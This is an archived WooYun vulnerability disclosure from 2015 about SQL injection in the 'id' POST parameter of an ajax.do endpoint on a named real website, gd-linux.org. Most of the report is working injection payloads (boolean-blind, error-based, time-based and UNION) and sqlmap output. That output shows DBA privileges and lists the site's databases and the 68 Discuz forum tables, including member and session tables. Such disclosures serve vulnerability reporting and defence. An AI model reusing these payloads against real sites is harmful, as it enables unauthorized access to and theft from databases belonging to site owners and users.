乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-15: 细节已通知厂商并且等待厂商处理中 2015-05-18: 厂商已经确认,细节仅向厂商公开 2015-05-28: 细节向核心白帽子及相关领域专家公开 2015-06-07: 细节向普通白帽子公开 2015-06-17: 细节向实习白帽子公开 2015-07-02: 细节向公众公开
233
http://www.gd-linux.org/ajax.do?act=getinfo&oper=ProductActionpost :id=1测试payload:id=1 and 1=1id=1 and 1=2确认问题存在
---Parameter: id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 8531=8531 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=1 AND (SELECT 5190 FROM(SELECT COUNT(*),CONCAT(0x71787a6271,(SELECT (ELT(5190=5190,1))),0x716b6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))iQgq) Type: UNION query Title: Generic UNION query (NULL) - 10 columns Payload: id=1 UNION ALL SELECT CONCAT(0x71787a6271,0x706b5468446e6d567459,0x716b6a6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ---web application technology: JSPback-end DBMS: MySQL 5.0current user is DBA: Trueavailable databases [7]:[*] discuz[*] gdlcweb[*] information_schema[*] kbase[*] mysql[*] sampdb[*] testDatabase: discuz[68 tables]+---------------------+| cdb_access || cdb_activities || cdb_activityapplies || cdb_adminactions || cdb_admingroups || cdb_adminnotes || cdb_adminsessions || cdb_advertisements || cdb_announcements || cdb_attachments || cdb_attachtypes || cdb_banned || cdb_bbcodes || cdb_blogcaches || cdb_buddys || cdb_creditslog || cdb_crons || cdb_failedlogins || cdb_favorites || cdb_forumfields || cdb_forumlinks || cdb_forums || cdb_medals || cdb_memberfields || cdb_members || cdb_moderators || cdb_modworks || cdb_myposts || cdb_mythreads || cdb_onlinelist || cdb_onlinetime || cdb_orders || cdb_paymentlog || cdb_pluginhooks || cdb_plugins || cdb_pluginvars || cdb_pms || cdb_pmsearchindex || cdb_polloptions || cdb_polls || cdb_posts || cdb_profilefields || cdb_promotions || cdb_pushedthreads || cdb_ranks || cdb_ratelog || cdb_regips || cdb_relatedthreads || cdb_rewardlog || cdb_rsscaches || cdb_searchindex || cdb_sessions || cdb_settings || cdb_smilies || cdb_stats || cdb_statvars || cdb_styles || cdb_stylevars || cdb_subscriptions || cdb_templates || cdb_threads || cdb_threadsmod || cdb_threadtypes || cdb_tradelog || cdb_trades || cdb_usergroups || cdb_validating || cdb_words |+---------------------+
~~
危害等级:低
漏洞Rank:5
确认时间:2015-05-18 08:39
感谢,前期已经有人提交过该站点的。。
暂无